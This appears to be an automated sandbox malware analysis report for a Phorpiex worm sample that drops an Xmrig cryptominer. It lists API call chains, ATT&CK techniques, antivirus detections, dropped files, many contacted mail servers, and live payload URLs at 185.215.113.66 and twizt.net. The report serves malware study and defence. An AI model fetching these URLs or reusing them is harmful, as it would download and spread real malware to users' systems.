                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_0040EB00 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,4_2_0040EB00
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_0040C580 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,4_2_0040C580
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_0040D8A0 CreateEventA,socket,htons,setsockopt,bind,CreateThread,5_2_0040D8A0
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_0040DD70 CreateEventA,socket,bind,CreateThread,5_2_0040DD70
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_0040EB00 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,5_2_0040EB00
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_0040C580 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,5_2_0040C580
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_0040D8A0 CreateEventA,socket,htons,setsockopt,bind,CreateThread,6_2_0040D8A0
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_0040DD70 CreateEventA,socket,bind,CreateThread,6_2_0040DD70
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_0040EB00 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,6_2_0040EB00
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_0040C580 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,6_2_0040C580
                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts2
                            Command and Scripting Interpreter
                            Path Interception11
                            Process Injection
                            121
                            Masquerading
                            11
                            Input Capture
                            2
                            System Time Discovery
                            Remote Services11
                            Input Capture
                            Exfiltration Over Other Network Medium2
                            Encrypted Channel
                            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                            Data Encrypted for Impact
                            Default Accounts11
                            Native API
                            Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
                            Disable or Modify Tools
                            LSASS Memory23
                            Security Software Discovery
                            Remote Desktop Protocol1
                            Archive Collected Data
                            Exfiltration Over Bluetooth1
                            Non-Standard Port
                            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
                            Virtualization/Sandbox Evasion
                            Security Account Manager21
                            Virtualization/Sandbox Evasion
                            SMB/Windows Admin Shares12
                            Clipboard Data
                            Automated Exfiltration15
                            Ingress Tool Transfer
                            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                            Process Injection
                            NTDS1
                            Remote System Discovery
                            Distributed Component Object ModelInput CaptureScheduled Transfer3
                            Non-Application Layer Protocol
                            SIM Card SwapCarrier Billing Fraud
                            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                            Hidden Files and Directories
                            LSA Secrets1
                            System Network Configuration Discovery
                            SSHKeyloggingData Transfer Size Limits33
                            Application Layer Protocol
                            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable MediaLaunchdRc.commonRc.common1
                            Obfuscated Files or Information
                            Cached Domain Credentials2
                            System Network Connections Discovery
                            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                            File and Directory Discovery
                            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem14
                            System Information Discovery
                            Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1292729 Sample: gEkl9O5tiu Startdate: 17/08/2023 Architecture: WINDOWS Score: 100 75 Snort IDS alert for network traffic 2->75 77 Found malware configuration 2->77 79 Antivirus detection for URL or domain 2->79 81 10 other signatures 2->81 9 gEkl9O5tiu.exe 13 2->9         started        14 sysesvcmw.exe 2->14         started        process3 dnsIp4 57 twizt.net 9->57 41 C:\Users\user\AppData\...\2550821914.exe, PE32 9->41 dropped 43 C:\Users\user\AppData\Local\...\newtpp[1].exe, PE32 9->43 dropped 87 Hides that the sample has been downloaded from the Internet (zone.identifier) 9->87 16 2550821914.exe 1 1 9->16         started        file5 signatures6 process7 file8 35 C:\Windows\ sysesvcmw.exe, PE32 16->35 dropped 67 Multi AV Scanner detection for dropped file 16->67 69 Found evasive API chain (may stop execution after checking mutex) 16->69 71 Contains functionality to check if Internet connection is working 16->71 73 5 other signatures 16->73 20 sysesvcmw.exe 7 16 16->20         started        signatures9 process10 dnsIp11 51 2.180.154.243 TCIIR Iran (ISLAMIC Republic Of) 20->51 53 31.58.71.101 RASANAIR Iran (ISLAMIC Republic Of) 20->53 55 21 other IPs or domains 20->55 37 C:\Users\user\AppData\...\1925824589.exe, PE32 20->37 dropped 39 C:\Users\user\AppData\Local\...\150623101.exe, PE32 20->39 dropped 83 Changes security center settings (notifications, updates, antivirus, firewall) 20->83 85 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->85 25 1925824589.exe 13 20->25         started        30 150623101.exe 12 20->30         started        file12 signatures13 process14 dnsIp15 59 mx3.zoho.com 136.143.191.44 ZOHO-ASUS United States 25->59 61 77.88.21.249 YANDEXRU Russian Federation 25->61 63 355 other IPs or domains 25->63 45 C:\Users\user\AppData\Local\...\706[1].txt, ASCII 25->45 dropped 89 Found evasive API chain (may stop execution after checking mutex) 25->89 91 Contains functionality to determine the online IP of the system 25->91 93 May check the online IP address of the machine 25->93 101 2 other signatures 25->101 47 C:\Users\user\AppData\...\2465513676.exe, PE32+ 30->47 dropped 49 C:\Users\user\AppData\Local\...\nxmr[1].exe, PE32+ 30->49 dropped 95 Antivirus detection for dropped file 30->95 97 Multi AV Scanner detection for dropped file 30->97 99 Machine Learning detection for dropped file 30->99 32 2465513676.exe 30->32         started        file16 signatures17 process18 signatures19 65 Multi AV Scanner detection for dropped file 32->65

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            gEkl9O5tiu.exe47%ReversingLabsWin32.Trojan.MintZard
                            gEkl9O5tiu.exe58%VirustotalBrowse
                            gEkl9O5tiu.exe100%Joe Sandbox ML
                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\150623101.exe100%AviraTR/Crypt.XPACK.Gen
                            C:\Windows\ sysesvcmw.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newtpp[1].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\2550821914.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\150623101.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1925824589.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newtpp[1].exe87%ReversingLabsWin32.Worm.Phorpiex
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nxmr[1].exe90%ReversingLabsWin64.Trojan.Xmrig
                            C:\Users\user\AppData\Local\Temp\150623101.exe92%ReversingLabsWin32.Worm.Phorpiex
                            C:\Users\user\AppData\Local\Temp\2465513676.exe90%ReversingLabsWin64.Trojan.Xmrig
                            C:\Users\user\AppData\Local\Temp\2550821914.exe87%ReversingLabsWin32.Worm.Phorpiex
                            C:\Windows\ sysesvcmw.exe87%ReversingLabsWin32.Worm.Phorpiex
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            mx101.solcon.nl0%VirustotalBrowse
                            mx3.bol.com.br0%VirustotalBrowse
                            SourceDetectionScannerLabelLink
                            http://185.215.113.66/from/n.txt100%Avira URL Cloudmalware
                            Http://185.215.113.66/5100%Avira URL Cloudmalware
                            http://185.215.113.66/from/706.txtn100%Avira URL Cloudmalware
                            http://185.215.113.66/getxmr100%Avira URL Cloudmalware
                            http://185.215.113.66/from/100%Avira URL Cloudmalware
                            http://185.215.113.66/1bbC:100%Avira URL Cloudmalware
                            http://185.215.113.66/from/http://185.215.113.66/from/n.txtB100%Avira URL Cloudmalware
                            http://185.215.113.66/getxmr%100%Avira URL Cloudmalware
                            http://185.215.113.66/4100%Avira URL Cloudmalware
                            http://twizt.net/peinstall.php%temp%%s100%Avira URL Cloudmalware
                            http://185.215.113.66/1100%Avira URL Cloudmalware
                            http://185.215.113.66/1C:100%Avira URL Cloudmalware
                            http://185.215.113.66/2u9o0b7n100%Avira URL Cloudmalware
                            http://185.215.113.66/3100%Avira URL Cloudmalware
                            http://185.215.113.66/5G100%Avira URL Cloudmalware
                            http://185.215.113.66/2100%Avira URL Cloudmalware
                            http://twizt.net/peinstall.php;O100%Avira URL Cloudmalware
                            http://185.215.113.66/100%Avira URL Cloudmalware
                            http://185.215.113.66/from/n.txtz100%Avira URL Cloudmalware
                            http://185.215.113.66/nxmr.exe100%Avira URL Cloudmalware
                            http://twizt.net/newtpp.exeP0100%Avira URL Cloudmalware
                            http://twizt.net/newtpp.exe100%Avira URL Cloudmalware
                            http://185.215.113.66/from/H100%Avira URL Cloudmalware
                            http://185.215.113.66/from/Tmlr100%Avira URL Cloudmalware
                            http://twizt.net/newtpp.exeV100%Avira URL Cloudmalware
                            http://twizt.net/peinstall.php100%Avira URL Cloudmalware
                            http://185.215.113.66/from/706.txt100%Avira URL Cloudmalware
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            alt3.gmail-smtp-in.l.google.com
                            142.250.157.27
                            truefalse
                              high
                              mx0b-00164701.pphosted.com
                              67.231.157.15
                              truefalse
                                high
                                kent-edu.mail.protection.outlook.com
                                52.101.11.7
                                truefalse
                                  high
                                  mx-ha02.web.de
                                  212.227.17.8
                                  truefalse
                                    high
                                    apsk12-org.mail.protection.outlook.com
                                    52.101.11.7
                                    truefalse
                                      high
                                      mx3.bol.com.br
                                      200.147.41.201
                                      truefalseunknown
                                      mx1.naver.com
                                      125.209.238.100
                                      truefalse
                                        high
                                        mx101.solcon.nl
                                        212.45.32.235
                                        truefalseunknown
                                        mail.faithforfathers.org
                                        50.87.180.65
                                        truefalse
                                          unknown
                                          ricomedyconnection-com.mail.protection.outlook.com
                                          104.47.59.138
                                          truefalse
                                            high
                                            mx1.ig.correio.biz
                                            177.153.23.241
                                            truefalse
                                              unknown
                                              alt2.aspmx.l.google.com
                                              74.125.200.26
                                              truefalse
                                                high
                                                smtpz4.laposte.net
                                                160.92.124.66
                                                truefalse
                                                  high
                                                  mx0a-00164701.pphosted.com
                                                  67.231.149.15
                                                  truefalse
                                                    high
                                                    aspmx3.googlemail.com
                                                    74.125.200.27
                                                    truefalse
                                                      unknown
                                                      ontarionature-org.mail.protection.outlook.com
                                                      104.47.75.228
                                                      truefalse
                                                        high
                                                        mx1.hc49497.c3s2.iphmx.com
                                                        68.232.156.120
                                                        truefalse
                                                          high
                                                          mx00.emig.gmx.net
                                                          212.227.15.9
                                                          truefalse
                                                            high
                                                            mx1.umd.iphmx.com
                                                            68.232.143.84
                                                            truefalse
                                                              high
                                                              mx.tim.it
                                                              34.141.161.132
                                                              truefalse
                                                                high
                                                                mx.inbound.vox.co.za
                                                                41.193.119.123
                                                                truefalse
                                                                  high
                                                                  cocinasfuego.com
                                                                  108.178.53.162
                                                                  truefalse
                                                                    unknown
                                                                    mx.wp.pl
                                                                    212.77.101.4
                                                                    truefalse
                                                                      high
                                                                      mx01.emig.gmx.net
                                                                      212.227.17.5
                                                                      truefalse
                                                                        high
                                                                        wigeon.in-mail.uvm.edu
                                                                        132.198.101.209
                                                                        truefalse
                                                                          high
                                                                          grupotechnos-com-br.mail.protection.outlook.com
                                                                          104.47.57.110
                                                                          truefalse
                                                                            high
                                                                            mx01.mail.icloud.com
                                                                            17.57.156.30
                                                                            truefalse
                                                                              high
                                                                              mailc.aljazeera.net
                                                                              194.6.255.77
                                                                              truefalse
                                                                                high
                                                                                byu-edu.mail.protection.outlook.com
                                                                                104.47.57.110
                                                                                truefalse
                                                                                  high
                                                                                  mx1.hc167-46.ca.iphmx.com
                                                                                  216.71.132.28
                                                                                  truefalse
                                                                                    high
                                                                                    cxr.mx.a.cloudfilter.net
                                                                                    34.212.80.54
                                                                                    truefalse
                                                                                      unknown
                                                                                      udlap-mx.mail.protection.outlook.com
                                                                                      52.101.42.4
                                                                                      truefalse
                                                                                        high
                                                                                        hooksisd-net.mail.eo.outlook.com
                                                                                        104.47.57.110
                                                                                        truefalse
                                                                                          high
                                                                                          mx2.orcon.net.nz
                                                                                          202.180.64.207
                                                                                          truefalse
                                                                                            unknown
                                                                                            stu-hopkins-kyschools-us.mail.protection.outlook.com
                                                                                            104.47.73.10
                                                                                            truefalse
                                                                                              high
                                                                                              student-tp-edu-sg.mail.protection.outlook.com
                                                                                              52.101.132.28
                                                                                              truefalse
                                                                                                high
                                                                                                mail.protonmail.ch
                                                                                                176.119.200.128
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  alt1.gmail-smtp-in.l.google.com
                                                                                                  142.250.150.27
                                                                                                  truefalse
                                                                                                    high
                                                                                                    mx00.mail.com
                                                                                                    74.208.5.20
                                                                                                    truefalse
                                                                                                      high
                                                                                                      mail.ampos.com
                                                                                                      190.0.224.84
                                                                                                      truefalse
                                                                                                        unknown
                                                                                                        mxa-000c9b01.gslb.pphosted.com
                                                                                                        205.220.178.177
                                                                                                        truefalse
                                                                                                          high
                                                                                                          cfstaffing-com.mail.protection.outlook.com
                                                                                                          104.47.59.138
                                                                                                          truefalse
                                                                                                            high
                                                                                                            mxa-00073f02.gslb.pphosted.com
                                                                                                            148.163.159.32
                                                                                                            truefalse
                                                                                                              high
                                                                                                              itesm-mx.mail.protection.outlook.com
                                                                                                              104.47.73.10
                                                                                                              truefalse
                                                                                                                high
                                                                                                                mx3.zoho.com
                                                                                                                136.143.191.44
                                                                                                                truefalse
                                                                                                                  high
                                                                                                                  biomax-co.mail.protection.outlook.com
                                                                                                                  104.47.51.110
                                                                                                                  truefalse
                                                                                                                    high
                                                                                                                    smtp2.azet.sk
                                                                                                                    91.235.53.42
                                                                                                                    truefalse
                                                                                                                      high
                                                                                                                      sportsfacilities.com
                                                                                                                      208.109.34.22
                                                                                                                      truefalse
                                                                                                                        unknown
                                                                                                                        d234566b.ess.barracudanetworks.com
                                                                                                                        209.222.82.253
                                                                                                                        truefalse
                                                                                                                          high
                                                                                                                          mta.vshosting.cloud
                                                                                                                          93.185.99.201
                                                                                                                          truefalse
                                                                                                                            high
                                                                                                                            mxb-004e5401.gslb.pphosted.com
                                                                                                                            205.220.175.7
                                                                                                                            truefalse
                                                                                                                              high
                                                                                                                              mx.interia.pl
                                                                                                                              217.74.65.64
                                                                                                                              truefalse
                                                                                                                                high
                                                                                                                                stu-upes-ac-in.mail.protection.outlook.com
                                                                                                                                104.47.74.138
                                                                                                                                truefalse
                                                                                                                                  high
                                                                                                                                  nam.olc.protection.outlook.com
                                                                                                                                  104.47.56.161
                                                                                                                                  truefalse
                                                                                                                                    high
                                                                                                                                    gmail-smtp-in.l.google.com
                                                                                                                                    108.177.127.27
                                                                                                                                    truefalse
                                                                                                                                      high
                                                                                                                                      thegreenchair-org.mail.protection.outlook.com
                                                                                                                                      104.47.58.110
                                                                                                                                      truefalse
                                                                                                                                        high
                                                                                                                                        capitaifs-com.mail.protection.outlook.com
                                                                                                                                        52.101.68.32
                                                                                                                                        truefalse
                                                                                                                                          high
                                                                                                                                          mx-stl.eco-mx.cz
                                                                                                                                          46.255.225.8
                                                                                                                                          truefalse
                                                                                                                                            unknown
                                                                                                                                            mxs.my.com
                                                                                                                                            95.163.54.140
                                                                                                                                            truefalse
                                                                                                                                              high
                                                                                                                                              mx.uol.com.br
                                                                                                                                              200.147.41.231
                                                                                                                                              truefalse
                                                                                                                                                unknown
                                                                                                                                                mx.siteprotect.com
                                                                                                                                                64.26.60.135
                                                                                                                                                truefalse
                                                                                                                                                  high
                                                                                                                                                  fb.mail.gandi.net
                                                                                                                                                  217.70.178.215
                                                                                                                                                  truefalse
                                                                                                                                                    high
                                                                                                                                                    live-com.olc.protection.outlook.com
                                                                                                                                                    104.47.11.33
                                                                                                                                                    truefalse
                                                                                                                                                      high
                                                                                                                                                      mxa.mailgun.org
                                                                                                                                                      34.149.236.64
                                                                                                                                                      truefalse
                                                                                                                                                        unknown
                                                                                                                                                        mx1.hc147-99.eu.iphmx.com
                                                                                                                                                        207.54.68.161
                                                                                                                                                        truefalse
                                                                                                                                                          high
                                                                                                                                                          mx1.hostinger.com.br
                                                                                                                                                          172.65.182.103
                                                                                                                                                          truefalse
                                                                                                                                                            unknown
                                                                                                                                                            mx.poczta.gazeta.pl
                                                                                                                                                            213.180.142.193
                                                                                                                                                            truefalse
                                                                                                                                                              high
                                                                                                                                                              mx-apac.mail.gm0.yahoodns.net
                                                                                                                                                              106.10.248.74
                                                                                                                                                              truefalse
                                                                                                                                                                unknown
                                                                                                                                                                etb-3.mail.tiscali.it
                                                                                                                                                                213.205.33.61
                                                                                                                                                                truefalse
                                                                                                                                                                  high
                                                                                                                                                                  outlook-com.olc.protection.outlook.com
                                                                                                                                                                  104.47.66.33
                                                                                                                                                                  truefalse
                                                                                                                                                                    high
                                                                                                                                                                    vcsc-K12-in-us.mail.eo.outlook.com
                                                                                                                                                                    104.47.70.110
                                                                                                                                                                    truefalse
                                                                                                                                                                      high
                                                                                                                                                                      trefita-com-br.mail.protection.outlook.com
                                                                                                                                                                      104.47.58.110
                                                                                                                                                                      truefalse
                                                                                                                                                                        high
                                                                                                                                                                        twizt.net
                                                                                                                                                                        185.215.113.84
                                                                                                                                                                        truefalse
                                                                                                                                                                          unknown
                                                                                                                                                                          mx2.hostinger.com
                                                                                                                                                                          172.65.182.103
                                                                                                                                                                          truefalse
                                                                                                                                                                            high
                                                                                                                                                                            me1.regionofwaterloo.ca
                                                                                                                                                                            192.237.29.12
                                                                                                                                                                            truefalse
                                                                                                                                                                              high
                                                                                                                                                                              cummins-cl.mail.protection.outlook.com
                                                                                                                                                                              104.47.23.138
                                                                                                                                                                              truefalse
                                                                                                                                                                                high
                                                                                                                                                                                163mx01.mxmail.netease.com
                                                                                                                                                                                103.129.252.82
                                                                                                                                                                                truefalse
                                                                                                                                                                                  high
                                                                                                                                                                                  mx3.mail.yahoo.co.jp
                                                                                                                                                                                  124.83.142.246
                                                                                                                                                                                  truefalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    lierskolen-no.mail.protection.outlook.com
                                                                                                                                                                                    104.47.11.202
                                                                                                                                                                                    truefalse
                                                                                                                                                                                      high
                                                                                                                                                                                      au-smtp-inbound-1.mimecast.com
                                                                                                                                                                                      103.13.69.26
                                                                                                                                                                                      truefalse
                                                                                                                                                                                        high
                                                                                                                                                                                        mx1-us1.ppe-hosted.com
                                                                                                                                                                                        67.231.154.162
                                                                                                                                                                                        truefalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          harlemvillage-org.mail.protection.outlook.com
                                                                                                                                                                                          104.47.70.110
                                                                                                                                                                                          truefalse
                                                                                                                                                                                            high
                                                                                                                                                                                            mxa-00270501.gslb.pphosted.com
                                                                                                                                                                                            208.86.201.19
                                                                                                                                                                                            truefalse
                                                                                                                                                                                              high
                                                                                                                                                                                              msn-com.olc.protection.outlook.com
                                                                                                                                                                                              104.47.58.33
                                                                                                                                                                                              truefalse
                                                                                                                                                                                                high
                                                                                                                                                                                                void.blackhole.mx
                                                                                                                                                                                                195.201.28.161
                                                                                                                                                                                                truefalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  mx3.naver.com
                                                                                                                                                                                                  125.209.222.14
                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    smtp1.rjf.com
                                                                                                                                                                                                    170.12.104.95
                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      dslcc-edu.mail.protection.outlook.com
                                                                                                                                                                                                      104.47.51.110
                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        mx-eu.mail.am0.yahoodns.net
                                                                                                                                                                                                        188.125.72.74
                                                                                                                                                                                                        truefalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          al-ip4-mx-vip1.prodigy.net
                                                                                                                                                                                                          144.160.235.143
                                                                                                                                                                                                          truefalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            mx.tlen.pl
                                                                                                                                                                                                            193.222.135.150
                                                                                                                                                                                                            truefalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              alt2.gmail-smtp-in.l.google.com
                                                                                                                                                                                                              74.125.200.26
                                                                                                                                                                                                              truefalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                mx2.hc576-93.ca.iphmx.com
                                                                                                                                                                                                                216.71.131.95
                                                                                                                                                                                                                truefalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  titusregional-com.mail.protection.outlook.com
                                                                                                                                                                                                                  52.101.11.3
                                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    edge.hallco.org
                                                                                                                                                                                                                    96.5.242.13
                                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      mxa-0032a601.gslb.pphosted.com
                                                                                                                                                                                                                      148.163.145.63
                                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        ALT1.ASPMX.L.GOOGLE.com
                                                                                                                                                                                                                        142.250.150.27
                                                                                                                                                                                                                        truefalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          alt4.gmail-smtp-in.l.google.com
                                                                                                                                                                                                                          173.194.202.27
                                                                                                                                                                                                                          truefalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            mxs.mail.ru
                                                                                                                                                                                                                            94.100.180.31
                                                                                                                                                                                                                            truefalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              mx2a1.comcast.net
                                                                                                                                                                                                                              96.103.145.164
                                                                                                                                                                                                                              truefalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                http://185.215.113.66/from/n.txttrue
                                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://185.215.113.66/5true
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://185.215.113.66/4true
                                                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://185.215.113.66/3true
                                                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://185.215.113.66/getxmrtrue
                                                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://185.215.113.66/2true
                                                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://icanhazip.com/false
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    http://185.215.113.66/1true
                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://185.215.113.66/nxmr.exetrue
                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://twizt.net/newtpp.exefalse
                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://twizt.net/peinstall.phpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://185.215.113.66/from/706.txttrue
                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                    Http://185.215.113.66/5 sysesvcmw.exe, 00000005.00000002.889397033.00000000002F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://185.215.113.66/1bbC: sysesvcmw.exe, 00000005.00000002.889397033.00000000002A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://schemas.xmlsoap.org/soap/encoding/ sysesvcmw.exe, 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      http://185.215.113.66/5G sysesvcmw.exe, 00000005.00000002.889729405.000000000247C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://schemas.xmlsoap.org/soap/envelope/ sysesvcmw.exe, 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        http://185.215.113.66/from/1925824589.exe, 1925824589.exe, 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmp, 1925824589.exe, 00000009.00000002.892928931.0000000002A5B000.00000004.00000010.00020000.00000000.sdmp, 1925824589.exe, 00000009.00000002.889442870.00000000003BD000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/from/706.txtn1925824589.exe, 00000009.00000002.891717748.0000000000464000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/1C: sysesvcmw.exe, 00000005.00000002.889397033.0000000000274000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://icanhazip.com/.1925824589.exe, 00000009.00000000.536791505.0000000000EA4000.00000002.00000001.01000000.00000006.sdmp, 1925824589.exe, 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          http://185.215.113.66/2u9o0b7n2550821914.exe, 00000004.00000000.370258337.0000000000414000.00000008.00000001.01000000.00000004.sdmp, 2550821914.exe, 00000004.00000002.381787142.00000000004D3000.00000004.00000020.00020000.00000000.sdmp, 2550821914.exe, 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmp, sysesvcmw.exe, 00000005.00000000.379474721.0000000000414000.00000008.00000001.01000000.00000005.sdmp, sysesvcmw.exe, 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmp, sysesvcmw.exe, 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://twizt.net/peinstall.php%temp%%sgEkl9O5tiu.exefalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://185.215.113.66/from/http://185.215.113.66/from/n.txtB1925824589.exe, 00000009.00000002.892928931.0000000002A5B000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://185.215.113.66/getxmr% sysesvcmw.exe, 00000005.00000002.889397033.00000000002C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://twizt.net/peinstall.php;OgEkl9O5tiu.exe, 00000001.00000002.379592341.0000000000714000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          unknown
